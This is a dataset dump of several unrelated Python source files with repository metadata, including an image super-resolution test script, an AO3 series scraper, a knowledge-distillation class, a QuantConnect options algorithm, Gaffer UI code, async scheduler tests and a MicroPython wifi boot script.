help="Test low resolution image name.")
parser.add_argument("--hr", type=str,
help="Raw high resolution image name.")
parser.add_argument("-a", "--arch", metavar="ARCH", default="rfb",
choices=model_names,
help="Model architecture: " +
" | ".join(model_names) +
". (Default: `rfb`)")
parser.add_argument("--upscale-factor", type=int, default=16, choices=[4, 16],
help="Low to high resolution scaling factor. Optional: [4, 16]. (Default: 16)")
parser.add_argument("--model-path", default="", type=str, metavar="PATH",
help="Path to latest checkpoint for model. (Default: ``)")
parser.add_argument("--pretrained", dest="pretrained", action="store_true",
help="Use pre-trained model.")
parser.add_argument("--seed", default=666, type=int,
help="Seed for initializing training. (Default: 666)")
parser.add_argument("--gpu", default=None, type=int,
help="GPU id to use.")
def main():
args = parser.parse_args()
random.seed(args.seed)
torch.manual_seed(args.seed)
cudnn.deterministic = True
main_worker(args.gpu, args)
def main_worker(gpu, args):
args.gpu = gpu
if args.gpu is not None:
logger.info(f"Use GPU: {args.gpu} for testing.")
model = configure(args)
if not torch.cuda.is_available():
logger.warning("Using CPU, this will be slow.")
if args.gpu is not None:
torch.cuda.set_device(args.gpu)
model = model.cuda(args.gpu)
# Set eval mode.
model.eval()
cudnn.benchmark = True
# Get image filename.
filename = os.path.basename(args.lr)
# Read all pictures.
lr = Image.open(args.lr)
bicubic = transforms.Resize((lr.size[1] * args.upscale_factor, lr.size[0] * args.upscale_factor), InterpolationMode.BICUBIC)(lr)
lr = process_image(lr, args.gpu)
bicubic = process_image(bicubic, args.gpu)
with torch.no_grad():
sr = model(lr)
if args.hr:
hr = process_image(Image.open(args.hr), args.gpu)
vutils.save_image(hr, os.path.join("tests", f"hr_{filename}"))
images = torch.cat([bicubic, sr, hr], dim=-1)
value = iqa(sr, hr, args.gpu)
print(f"Performance avg results:\n")
print(f"indicator Score\n")
print(f"--------- -----\n")
print(f"MSE {value[0]:6.4f}\n"
f"RMSE {value[1]:6.4f}\n"
f"PSNR {value[2]:6.2f}\n"
f"SSIM {value[3]:6.4f}\n"
f"LPIPS {value[4]:6.4f}\n"
f"GMSD {value[5]:6.4f}\n")
else:
images = torch.cat([bicubic, sr], dim=-1)
vutils.save_image(lr, os.path.join("tests", f"lr_{filename}"))
vutils.save_image(bicubic, os.path.join("tests", f"bicubic_{filename}"))
vutils.save_image(sr, os.path.join("tests", f"sr_{filename}"))
vutils.save_image(images, os.path.join("tests", f"compare_{filename}"), padding=10)
if __name__ == "__main__":
print("##################################################\n")
print("Run Testing Engine.\n")
create_folder("tests")
logger.info("TestingEngine:")
print("\tAPI version .......... 0.2.0")
print("\tBuild ................ 2021.04.15")
print("##################################################\n")
main()
logger.info("Test single image performance evaluation completed successfully.\n")
| 37.597122
| 138
| 0.628396
|
4a0e916f8c42b9aa380c98113c51696165544c4a
| 9,990
|
py
|
Python
|
AO3/series.py
|
gf0507033/ao3_api
|
675efd41c66812265bb6cfe4bfc6dde8c1db5bd2
|
[
"MIT"
] | null | null | null |
AO3/series.py
|
gf0507033/ao3_api
|
675efd41c66812265bb6cfe4bfc6dde8c1db5bd2
|
[
"MIT"
] | null | null | null |
AO3/series.py
|
gf0507033/ao3_api
|
675efd41c66812265bb6cfe4bfc6dde8c1db5bd2
|
[
"MIT"
] | null | null | null |
from datetime import date
from cached_property import cached_property
from bs4 import BeautifulSoup
from . import threadable, utils
from .requester import requester
from .users import User
from .works import Work
class Series:
def __init__(self, seriesid, session=None, load=True):
"""Creates a new series object
Args:
seriesid (int/str): ID of the series
session (AO3.Session, optional): Session object. Defaults to None.
load (bool, optional): If true, the work is loaded on initialization. Defaults to True.
Raises:
utils.InvalidIdError: Invalid series ID
"""
self.seriesid = seriesid
self._session = session
self._soup = None
if load:
self.reload()
def __eq__(self, other):
return isinstance(other, Series) and other.seriesid == self.seriesid
def __repr__(self):
try:
return f"<Series [{self.name}]>"
except:
return f"<Series [{self.seriesid}]>"
def __getstate__(self):
d = {}
for attr in self.__dict__:
if isinstance(self.__dict__[attr], BeautifulSoup):
d[attr] = (self.__dict__[attr].encode(), True)
else:
d[attr] = (self.__dict__[attr], False)
return d
def __setstate__(self, d):
for attr in d:
value, issoup = d[attr]
if issoup:
self.__dict__[attr] = BeautifulSoup(value, "lxml")
else:
self.__dict__[attr] = value
@threadable.threadable
def reload(self):
"""
Loads information about this series.
This function is threadable.
"""
for attr in self.__class__.__dict__:
if isinstance(getattr(self.__class__, attr), cached_property):
if attr in self.__dict__:
delattr(self, attr)
self._soup = self.request(f"https://archiveofourown.org/series/{self.seriesid}")
if "Error 404" in self._soup.text:
raise utils.InvalidIdError("Cannot find series")
@threadable.threadable
def subscribe(self):
"""Subscribes to this series.
This function is threadable.
Raises:
utils.AuthError: Invalid session
"""
if self._session is None or not self._session.is_authed:
raise utils.AuthError("You can only subscribe to a series using an authenticated session")
utils.subscribe(self.seriesid, "Series", self._session)
@threadable.threadable
def unsubscribe(self):
"""Unubscribes from this series.
This function is threadable.
Raises:
utils.AuthError: Invalid session
"""
if not self.is_subscribed:
raise Exception("You are not subscribed to this series")
if self._session is None or not self._session.is_authed:
raise utils.AuthError("You can only unsubscribe from a series using an authenticated session")
utils.subscribe(self.seriesid, "Series", self._session, True, self._sub_id)
@cached_property
def is_subscribed(self):
"""True if you're subscribed to this series"""
if self._session is None or not self._session.is_authed:
raise utils.AuthError("You can only get a series ID using an authenticated session")
form = self._soup.find("form", {"data-create-value": "Subscribe"})
input_ = form.find("input", {"name": "commit", "value": "Unsubscribe"})
return input_ is not None
@cached_property
def _sub_id(self):
"""Returns the subscription ID. Used for unsubscribing"""
if not self.is_subscribed:
raise Exception("You are not subscribed to this series")
form = self._soup.find("form", {"data-create-value": "Subscribe"})
id_ = form.attrs["action"].split("/")[-1]
return int(id_)
@cached_property
def name(self):
div = self._soup.find("div", {"class": "series-show region"})
return div.h2.getText().replace("\t", "").replace("\n", "")
@cached_property
def creators(self):
dl = self._soup.find("dl", {"class": "series meta group"})
return [User(author.getText(), load=False) for author in dl.findAll("a", {"rel": "author"})]
@cached_property
def series_begun(self):
dl = self._soup.find("dl", {"class": "series meta group"})
info = dl.findAll(("dd", "dt"))
last_dt = None
for field in info:
if field.name == "dt":
last_dt = field.getText().strip()
elif last_dt == "Series Begun:":
date_str = field.getText().strip()
break
return date(*list(map(int, date_str.split("-"))))
@cached_property
def series_updated(self):
dl = self._soup.find("dl", {"class": "series meta group"})
info = dl.findAll(("dd", "dt"))
last_dt = None
for field in info:
if field.name == "dt":
last_dt = field.getText().strip()
elif last_dt == "Series Updated:":
date_str = field.getText().strip()
break
return date(*list(map(int, date_str.split("-"))))
@cached_property
def words(self):
dl = self._soup.find("dl", {"class": "series meta group"})
stats = dl.find("dl", {"class": "stats"}).findAll(("dd", "dt"))
last_dt = None
for field in stats:
if field.name == "dt":
last_dt = field.getText().strip()
elif last_dt == "Words:":
words = field.getText().strip()
break
return int(words.replace(",", ""))
@cached_property
def nworks(self):
dl = self._soup.find("dl", {"class": "series meta group"})
stats = dl.find("dl", {"class": "stats"}).findAll(("dd", "dt"))
last_dt = None
for field in stats:
if field.name == "dt":
last_dt = field.getText().strip()
elif last_dt == "Works:":
works = field.getText().strip()
break
return int(works.replace(",", ""))
@cached_property
def complete(self):
dl = self._soup.find("dl", {"class": "series meta group"})
stats = dl.find("dl", {"class": "stats"}).findAll(("dd", "dt"))
last_dt = None
for field in stats:
if field.name == "dt":
last_dt = field.getText().strip()
elif last_dt == "Complete:":
complete = field.getText().strip()
break
return True if complete == "Yes" else False
@cached_property
def description(self):
dl = self._soup.find("dl", {"class": "series meta group"})
info = dl.findAll(("dd", "dt"))
last_dt = None
desc = ""
for field in info:
if field.name == "dt":
last_dt = field.getText().strip()
elif last_dt == "Description:":
desc = field.getText().strip()
break
return desc
@cached_property
def notes(self):
dl = self._soup.find("dl", {"class": "series meta group"})
info = dl.findAll(("dd", "dt"))
last_dt = None
notes = ""
for field in info:
if field.name == "dt":
last_dt = field.getText().strip()
elif last_dt == "Notes:":
notes = field.getText().strip()
break
return notes
@cached_property
def nbookmarks(self):
dl = self._soup.find("dl", {"class": "series meta group"})
stats = dl.find("dl", {"class": "stats"}).findAll(("dd", "dt"))
last_dt = None
for field in stats:
if field.name == "dt":
last_dt = field.getText().strip()
elif last_dt == "Bookmarks:":
book = field.getText().strip()
break
return int(book.replace(",", ""))
@cached_property
def work_list(self):
ul = self._soup.find("ul", {"class": "series work index group"})
works = []
for work in ul.find_all("li", {'class': 'work blurb group'}):
authors = []
if work.h4 is None:
continue
for a in work.h4.find_all("a"):
if 'rel' in a.attrs.keys():
if "author" in a['rel']:
authors.append(User(a.string, load=False))
elif a.attrs["href"].startswith("/works"):
workname = a.string
workid = utils.workid_from_url(a['href'])
new = Work(workid, load=False)
setattr(new, "title", workname)
setattr(new, "authors", authors)
works.append(new)
return works
def get(self, *args, **kwargs):
"""Request a web page and return a Response object"""
if self._session is None:
req = requester.request("get", *args, **kwargs)
else:
req = requester.request("get", *args, **kwargs, session=self._session.session)
if req.status_code == 429:
raise utils.HTTPError("We are being rate-limited. Try again in a while or reduce the number of requests")
return req
def request(self, url):
"""Request a web page and return a BeautifulSoup object.
Args:
url (str): Url to request
Returns:
bs4.BeautifulSoup: BeautifulSoup object representing the requested page's html
"""
req = self.get(url)
soup = BeautifulSoup(req.content, "lxml")
return soup
| 34.93007
| 117
| 0.536537
|
4a0e917a04c793844b63ee797ce514f689386ae6
| 2,572
|
py
|
Python
|
KD_Lib/KD/vision/attention/attention.py
|
PiaCuk/KD_Lib
|
153299d484e4c6b33793749709dbb0f33419f190
|
[
"MIT"
] | 360
|
2020-05-11T08:18:20.000Z
|
2022-03-31T01:48:43.000Z
|
KD_Lib/KD/vision/attention/attention.py
|
PiaCuk/KD_Lib
|
153299d484e4c6b33793749709dbb0f33419f190
|
[
"MIT"
] | 91
|
2020-05-11T08:14:56.000Z
|
2022-03-30T05:29:03.000Z
|
KD_Lib/KD/vision/attention/attention.py
|
PiaCuk/KD_Lib
|
153299d484e4c6b33793749709dbb0f33419f190
|
[
"MIT"
] | 39
|
2020-05-11T08:06:47.000Z
|
2022-03-29T05:11:18.000Z
|
import torch.nn.functional as F
from KD_Lib.KD.common import BaseClass
from .loss_metric import ATLoss
class Attention(BaseClass):
"""
Implementation of attention-based Knowledge distillation from the paper "Paying More
Attention To The Attention - Improving the Performance of CNNs via Attention Transfer"
https://arxiv.org/pdf/1612.03928.pdf
:param teacher_model (torch.nn.Module): Teacher model
:param student_model (torch.nn.Module): Student model
:param train_loader (torch.utils.data.DataLoader): Dataloader for training
:param val_loader (torch.utils.data.DataLoader): Dataloader for validation/testing
:param optimizer_teacher (torch.optim.*): Optimizer used for training teacher
:param optimizer_student (torch.optim.*): Optimizer used for training student
:param loss_fn (torch.nn.Module): Calculates loss during distillation
:param temp (float): Temperature parameter for distillation
:param distil_weight (float): Weight paramter for distillation loss
:param device (str): Device used for training; 'cpu' for cpu and 'cuda' for gpu
:param log (bool): True if logging required
:param logdir (str): Directory for storing logs
"""
def __init__(
self,
teacher_model,
student_model,
train_loader,
val_loader,
optimizer_teacher,
optimizer_student,
temp=20.0,
distil_weight=0.5,
device="cpu",
log=False,
logdir="./Experiments",
):
super(Attention, self).__init__(
teacher_model,
student_model,
train_loader,
val_loader,
optimizer_teacher,
optimizer_student,
ATLoss(),
temp,
distil_weight,
device,
log,
logdir,
)
self.loss_fn = self.loss_fn.to(self.device)
def calculate_kd_loss(self, y_pred_student, y_pred_teacher, y_true):
"""
Function used for calculating the KD loss during distillation
:param y_pred_student (torch.FloatTensor): Prediction made by the student model
:param y_pred_teacher (torch.FloatTensor): Prediction made by the teacher model
:param y_true (torch.FloatTensor): Original label
"""
loss = (
(1.0 - self.distil_weight)
* self.temp
* F.cross_entropy(y_pred_student[0] / self.temp, y_true)
)
loss += self.distil_weight * self.loss_fn(y_pred_teacher, y_pred_student)
return loss
| 35.232877
| 90
| 0.650855
|
4a0e922a7e7c541445b87ed9862fe3ab7a8d2b97
| 4,067
|
py
|
Python
|
Algorithm.Python/FutureOptionBuySellCallIntradayRegressionAlgorithm.py
|
szymanskilukasz/Lean
|
fe2ac131af2d0614494e5c970a57d4b7c89d5f88
|
[
"Apache-2.0"
] | 3
|
2021-02-18T08:06:35.000Z
|
2021-02-23T17:12:47.000Z
|
Algorithm.Python/FutureOptionBuySellCallIntradayRegressionAlgorithm.py
|
szymanskilukasz/Lean
|
fe2ac131af2d0614494e5c970a57d4b7c89d5f88
|
[
"Apache-2.0"
] | 1
|
2021-02-22T21:03:27.000Z
|
2021-02-23T19:01:04.000Z
|
Algorithm.Python/FutureOptionBuySellCallIntradayRegressionAlgorithm.py
|
szymanskilukasz/Lean
|
fe2ac131af2d0614494e5c970a57d4b7c89d5f88
|
[
"Apache-2.0"
] | 1
|
2021-03-12T05:22:15.000Z
|
2021-03-12T05:22:15.000Z
|
# QUANTCONNECT.COM - Democratizing Finance, Empowering Individuals.
# Lean Algorithmic Trading Engine v2.0. Copyright 2014 QuantConnect Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License
from datetime import datetime, timedelta
import clr
from System import *
from System.Reflection import *
from QuantConnect import *
from QuantConnect.Algorithm import *
from QuantConnect.Data import *
from QuantConnect.Data.Market import *
from QuantConnect.Orders import *
from QuantConnect.Securities import *
from QuantConnect.Securities.Future import *
from QuantConnect import Market
### <summary>
### This regression algorithm tests In The Money (ITM) future option calls across different strike prices.
### We expect 6 orders from the algorithm, which are:
###
### * (1) Initial entry, buy ES Call Option (ES19M20 expiring ITM)
### * (2) Initial entry, sell ES Call Option at different strike (ES20H20 expiring ITM)
### * [2] Option assignment, opens a position in the underlying (ES20H20, Qty: -1)
### * [2] Future contract liquidation, due to impending expiry
### * [1] Option exercise, receive 1 ES19M20 future contract
### * [1] Liquidate ES19M20 contract, due to expiry
###
### Additionally, we test delistings for future options and assert that our
### portfolio holdings reflect the orders the algorithm has submitted.
### </summary>
class FutureOptionBuySellCallIntradayRegressionAlgorithm(QCAlgorithm):
def Initialize(self):
self.SetStartDate(2020, 1, 5)
self.SetEndDate(2020, 6, 30)
self.es20h20 = self.AddFutureContract(
Symbol.CreateFuture(
Futures.Indices.SP500EMini,
Market.CME,
datetime(2020, 3, 20)
),
Resolution.Minute).Symbol
self.es19m20 = self.AddFutureContract(
Symbol.CreateFuture(
Futures.Indices.SP500EMini,
Market.CME,
datetime(2020, 6, 19)
),
Resolution.Minute).Symbol
# Select a future option expiring ITM, and adds it to the algorithm.
self.esOptions = [
self.AddFutureOptionContract(i, Resolution.Minute).Symbol for i in (self.OptionChainProvider.GetOptionContractList(self.es19m20, self.Time) + self.OptionChainProvider.GetOptionContractList(self.es20h20, self.Time)) if i.ID.StrikePrice == 3200.0 and i.ID.OptionRight == OptionRight.Call
]
self.expectedContracts = [
Symbol.CreateOption(self.es20h20, Market.CME, OptionStyle.American, OptionRight.Call, 3200.0, datetime(2020, 3, 20)),
Symbol.CreateOption(self.es19m20, Market.CME, OptionStyle.American, OptionRight.Call, 3200.0, datetime(2020, 6, 19))
]
for esOption in self.esOptions:
if esOption not in self.expectedContracts:
raise AssertionError(f"Contract {esOption} was not found in the chain")
self.Schedule.On(self.DateRules.Tomorrow, self.TimeRules.AfterMarketOpen(self.es19m20, 1), self.ScheduleCallbackBuy)
self.Schedule.On(self.DateRules.Tomorrow, self.TimeRules.Noon, self.ScheduleCallbackLiquidate)
def ScheduleCallbackBuy(self):
self.MarketOrder(self.esOptions[0], 1)
self.MarketOrder(self.esOptions[1], -1)
def ScheduleCallbackLiquidate(self):
self.Liquidate()
def OnEndOfAlgorithm(self):
if self.Portfolio.Invested:
raise AssertionError(f"Expected no holdings at end of algorithm, but are invested in: {', '.join([str(i.ID) for i in self.Portfolio.Keys])}")
| 44.206522
| 297
| 0.703221
|
4a0e9362beed4d61daebdf89b0fe1d4a6388d312
| 625
|
py
|
Python
|
hc/accounts/migrations/0009_auto_20180702_0510.py
|
andela/hc-wits-kla
|
ce14d6841c31b525ed8aec42b283ebe5db7cc3f8
|
[
"BSD-3-Clause"
] | null | null | null |
hc/accounts/migrations/0009_auto_20180702_0510.py
|
andela/hc-wits-kla
|
ce14d6841c31b525ed8aec42b283ebe5db7cc3f8
|
[
"BSD-3-Clause"
] | 33
|
2018-06-21T06:05:39.000Z
|
2021-12-13T19:47:43.000Z
|
hc/accounts/migrations/0009_auto_20180702_0510.py
|
andela/hc-wits-kla
|
ce14d6841c31b525ed8aec42b283ebe5db7cc3f8
|
[
"BSD-3-Clause"
] | 2
|
2018-07-12T18:18:09.000Z
|
2021-12-22T11:21:19.000Z
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10 on 2018-07-02 05:10
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('api', '0026_auto_20160415_1824'),
('accounts', '0008_auto_20180630_1451'),
]
operations = [
migrations.RemoveField(
model_name='member',
name='assigned_job',
),
migrations.AddField(
model_name='member',
name='assigned_job',
field=models.ManyToManyField(null=True, to='api.Check'),
),
]
| 24.038462
| 68
| 0.5968
|
4a0e93c30d799b1ef207d5cddfd8796f4cb62ee8
| 3,805
|
py
|
Python
|
python/GafferUI/NodeUI.py
|
cwmartin/gaffer
|
1f8a0f75522105c9d5efefac6d55cb61c1038909
|
[
"BSD-3-Clause"
] | null | null | null |
python/GafferUI/NodeUI.py
|
cwmartin/gaffer
|
1f8a0f75522105c9d5efefac6d55cb61c1038909
|
[
"BSD-3-Clause"
] | null | null | null |
python/GafferUI/NodeUI.py
|
cwmartin/gaffer
|
1f8a0f75522105c9d5efefac6d55cb61c1038909
|
[
"BSD-3-Clause"
] | null | null | null |
##########################################################################
#
# Copyright (c) 2011-2012, John Haddon. All rights reserved.
# Copyright (c) 2011-2013, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import re
import fnmatch
import IECore
import Gaffer
import GafferUI
## This class forms the base class for all uis for nodes.
class NodeUI( GafferUI.Widget ) :
def __init__( self, node, topLevelWidget, **kw ) :
GafferUI.Widget.__init__( self, topLevelWidget, **kw )
self.__node = node
self.__readOnly = False
## Returns the node the ui represents.
def node( self ) :
return self.__node
## Should be implemented by derived classes to return
# a PlugValueWidget they are using to represent the
# specified plug. Since many UIs are built lazily on
# demand, this may return None unless lazy=False is
# passed to force creation of parts of the UI that
# otherwise are not yet visible to the user.
def plugValueWidget( self, plug, lazy=True ) :
return None
## Can be called to make the UI read only - must
# be implemented appropriately by derived classes.
def setReadOnly( self, readOnly ) :
assert( isinstance( readOnly, bool ) )
self.__readOnly = readOnly
def getReadOnly( self ) :
return self.__readOnly
## Creates a NodeUI instance for the specified node.
@classmethod
def create( cls, node ) :
nodeHierarchy = IECore.RunTimeTyped.baseTypeIds( node.typeId() )
for typeId in [ node.typeId() ] + nodeHierarchy :
nodeUI = cls.__nodeUIs.get( typeId, None )
if nodeUI is not None :
return nodeUI( node )
assert( 0 )
__nodeUIs = {}
## Registers a subclass of NodeUI to be used with a specific node type.
@classmethod
def registerNodeUI( cls, nodeClassOrTypeId, nodeUICreator ) :
assert( callable( nodeUICreator ) )
if isinstance( nodeClassOrTypeId, IECore.TypeId ) :
nodeTypeId = nodeClassOrTypeId
else :
nodeTypeId = nodeClassOrTypeId.staticTypeId()
cls.__nodeUIs[nodeTypeId] = nodeUICreator
GafferUI.Nodule.registerNodule( Gaffer.Node, "user", lambda plug : None )
Gaffer.Metadata.registerPlugValue( Gaffer.Node, "user", "nodeUI:section", "User" )
| 34.279279
| 82
| 0.705388
|
4a0e942b39392b31e2e99d0b97c0b65ea97a60a2
| 8,214
|
py
|
Python
|
test/test_scheduler.py
|
skybrush-io/flockwave-async
|
242055f551966dde9b035ff87ed10ed52f6cdf26
|
[
"MIT"
] | null | null | null |
test/test_scheduler.py
|
skybrush-io/flockwave-async
|
242055f551966dde9b035ff87ed10ed52f6cdf26
|
[
"MIT"
] | null | null | null |
test/test_scheduler.py
|
skybrush-io/flockwave-async
|
242055f551966dde9b035ff87ed10ed52f6cdf26
|
[
"MIT"
] | null | null | null |
from pytest import deprecated_call, raises
from time import time
from trio import sleep
from typing import Optional
from flockwave.concurrency.scheduler import JobCancelled, LateSubmissionError, Scheduler
class Task:
def __init__(self, result: int = 0, *, error: Optional[str] = None):
self._result = result
self._error = error
self.called = False
async def __call__(self) -> int:
self.called = True
await sleep(1)
if self._error is not None:
raise RuntimeError(self._error)
else:
return self._result
async def test_scheduler_single_job(nursery, autojump_clock):
scheduler = Scheduler()
await nursery.start(scheduler.run)
task = Task(42)
job = scheduler.schedule_after(5, task)
assert job.outcome is None
assert not job.running and not job.completed
await sleep(1)
assert job.outcome is None
assert not job.running and not job.completed
await sleep(4.1)
assert job.outcome is None
assert job.running and not job.completed
assert 42 == await job.wait()
assert not job.running and job.completed
async def test_scheduler_single_job_wait_twice(nursery, autojump_clock):
scheduler = Scheduler()
await nursery.start(scheduler.run)
task = Task(42)
job = scheduler.schedule_after(5, task)
assert 42 == await job.wait()
assert 42 == await job.wait()
async def test_scheduler_single_job_throwing_error(nursery, autojump_clock):
scheduler = Scheduler()
await nursery.start(scheduler.run)
task = Task(error="foo")
job = scheduler.schedule_after(5, task)
with raises(RuntimeError, match="foo"):
await job.wait()
assert not job.running and job.completed
async def test_scheduler_does_not_crash_when_job_crashes(nursery, autojump_clock):
scheduler = Scheduler()
await nursery.start(scheduler.run)
task = Task(error="foo")
scheduler.schedule_after(5, task)
task2 = Task(42)
job = scheduler.schedule_after(7, task2)
await sleep(9)
assert not job.running and job.completed
assert 42 == await job.wait()
async def test_scheduler_multiple_jobs(nursery, autojump_clock):
scheduler = Scheduler()
job = scheduler.schedule_after(3, Task(1))
job2 = scheduler.schedule_at(time() + 5, Task(error="bar"))
await nursery.start(scheduler.run)
job3 = scheduler.schedule_after(5.5, Task(3))
jobs = [job, job2, job3]
assert not any(job.running or job.completed for job in jobs)
await sleep(2)
assert not any(job.running or job.completed for job in jobs)
await sleep(1.1)
assert job.running and not job.completed
assert not job2.running and not job2.completed
assert not job3.running and not job3.completed
await sleep(1)
assert not job.running and job.completed
assert 1 == await job.wait()
assert not job2.running and not job2.completed
assert not job3.running and not job3.completed
await sleep(1)
assert not job.running and job.completed
assert job2.running and not job2.completed
assert not job3.running and not job3.completed
await sleep(0.5)
assert not job.running and job.completed
assert job2.running and not job2.completed
assert job3.running and not job3.completed
with raises(RuntimeError, match="bar"):
await job2.wait()
assert not job.running and job.completed
assert not job2.running and job2.completed
assert job3.running and not job3.completed
await sleep(0.51)
assert all(not job.running and job.completed for job in jobs)
assert 3 == await job3.wait()
async def test_job_cancellation(nursery, autojump_clock):
scheduler = Scheduler()
job = scheduler.schedule_after(3, Task(1))
await nursery.start(scheduler.run)
await sleep(1)
scheduler.cancel(job)
assert not job.running and job.completed
with raises(JobCancelled):
await job.wait()
async def test_job_cancellation_when_running(nursery, autojump_clock):
scheduler = Scheduler()
job = scheduler.schedule_after(3, Task(1))
await nursery.start(scheduler.run)
await sleep(3.5)
scheduler.cancel(job)
assert not job.running and job.completed
with raises(JobCancelled):
await job.wait()
async def test_job_rescheduling(nursery, autojump_clock):
scheduler = Scheduler()
job = scheduler.schedule_after(3, Task(1))
job2 = scheduler.schedule_after(5, Task(2))
job3 = scheduler.schedule_after(7, Task(3))
await nursery.start(scheduler.run)
await sleep(0.5)
scheduler.reschedule_after(0.5, job2)
assert not job2.running and not job2.completed
await sleep(0.6)
assert job2.running and not job2.completed
await sleep(1)
assert not job2.running and job2.completed
assert 2 == await job2.wait()
scheduler.reschedule_to(time() + 7.9, job)
assert 3 == await job3.wait()
assert not job.running and not job.completed
await sleep(2.1)
assert job.running and not job.completed
await sleep(1)
assert not job.running and job.completed
assert 1 == await job.wait()
job4 = scheduler.schedule_after(1, Task(4))
await sleep(1.5)
with raises(RuntimeError, match="started already"):
scheduler.reschedule_after(1, job4)
job5 = scheduler.schedule_at(time() + 0.1, Task(4))
await sleep(0.6)
with raises(RuntimeError, match="started already"):
scheduler.reschedule_to(time() + 1, job5)
async def test_job_running_twice(nursery, autojump_clock):
scheduler = Scheduler()
await nursery.start(scheduler.run)
job = scheduler.schedule_after(3, Task(1))
assert 1 == await job.wait()
with raises(RuntimeError, match="already executed"):
await job._run()
job = scheduler.schedule_after(3, Task(1))
await sleep(3.5)
with raises(RuntimeError, match="running"):
await job._run()
async def test_job_late_cancellation(nursery, autojump_clock):
scheduler = Scheduler()
await nursery.start(scheduler.run)
job = scheduler.schedule_after(3, Task(1))
assert 1 == await job.wait()
scheduler.cancel(job)
assert 1 == await job.wait()
async def test_job_late_submission():
scheduler = Scheduler()
assert scheduler.allow_late_start
scheduler = Scheduler(allow_late_start=False)
assert not scheduler.allow_late_start
scheduler = Scheduler(allow_late_start=True)
assert scheduler.allow_late_start
# This should be OK
scheduler.schedule_after(-3, Task(1))
# This is not OK
scheduler.allow_late_start = False
with raises(LateSubmissionError):
scheduler.schedule_after(-3, Task(1))
async def test_job_late_submission_override():
scheduler = Scheduler(allow_late_start=False)
# This should be OK because we override the scheduler
scheduler.schedule_after(-3, Task(1), allow_late_start=True)
# This is not OK
with raises(LateSubmissionError):
scheduler.schedule_after(-3, Task(1))
# This should be OK because we override the scheduler
scheduler.schedule_at(time() - 2, Task(1), allow_late_start=True)
# This is not OK
with raises(LateSubmissionError):
scheduler.schedule_at(time() - 2, Task(1))
async def test_job_rescheduling_to_past(nursery, autojump_clock):
scheduler = Scheduler(allow_late_start=False)
job = scheduler.schedule_after(3, Task(1))
await nursery.start(scheduler.run)
with raises(LateSubmissionError):
scheduler.reschedule_after(-3, job)
# Failed rescheduling should keep the start time intact
assert not job.running and not job.completed
await sleep(3.1)
assert job.running and not job.completed
assert 1 == await job.wait()
async def test_deprecated_constructor_args():
with deprecated_call():
scheduler = Scheduler(True, allow_late_submissions=False)
assert not scheduler.allow_late_start
with deprecated_call():
scheduler = Scheduler(False, allow_late_submissions=True)
assert scheduler.allow_late_start
with raises(TypeError, match="unexpected keyword argument: 'foo'"):
scheduler = Scheduler(foo="bar")
| 28.620209
| 88
| 0.704407
|
4a0e942e203d7f01921c7653bdde96c6978035bd
| 323
|
py
|
Python
|
src/boot.py
|
overdone/climate_control
|
932db9a7d22322042c5fb8b2a8afebea4e197c2c
|
[
"MIT"
] | null | null | null |
src/boot.py
|
overdone/climate_control
|
932db9a7d22322042c5fb8b2a8afebea4e197c2c
|
[
"MIT"
] | null | null | null |
src/boot.py
|
overdone/climate_control
|
932db9a7d22322042c5fb8b2a8afebea4e197c2c
|
[
"MIT"
] | null | null | null |
import network
import gc
import settings
gc.collect()
def do_wifi_connect():
sta_if = network.WLAN(network.STA_IF)
if not sta_if.isconnected():
sta_if.active(True)
sta_if.connect(settings.WIFI_SID, settings.WIFI_PASS)
while not sta_if.isconnected():
pass
do_wifi_connect()
| 17
| 61
| 0.681115
|
4a0e95186e815e34d814047ed69c171c3f52252b
| 2,750
|
py
|
Python
|
camviz/objects/object.py
|
TRI-ML/camviz
|
ba1d8b92dff2ae01616c999739eca3e507434f4f
|
[
"MIT"
] | 30
|
2021-12-13T21:26:22.000Z
|
2022-03-15T16:11:59.000Z
|
camviz/objects/object.py
|
TRI-ML/camviz
|
ba1d8b92dff2ae01616c999739eca3e507434f4f
|
[
"MIT"
] | 4
|
2021-12-14T15:23:51.000Z
|
2022-02-17T07:51:59.000Z
|
camviz/objects/object.py
|
TRI-ML/camviz
|
ba1d8b92dff2ae01616c999739eca3e507434f4f
|
[
"MIT"
] | 1
|
2021-12-23T07:38:30.000Z
|
2021-12-23T07:38:30.000Z
|
# Copyright 2021 Toyota Research Institute. All rights reserved.
from OpenGL.GL import *
from camviz.objects.pose import Pose
class Object:
"""
Base object draw class
Parameters
----------
scale : float
Scale used when drawing the object
pose : np.array
Object pose
"""
def __init__(self, scale=1.0, pose=None):
self.scale = scale
self.pose = pose if isinstance(pose, Pose) else Pose(pose)
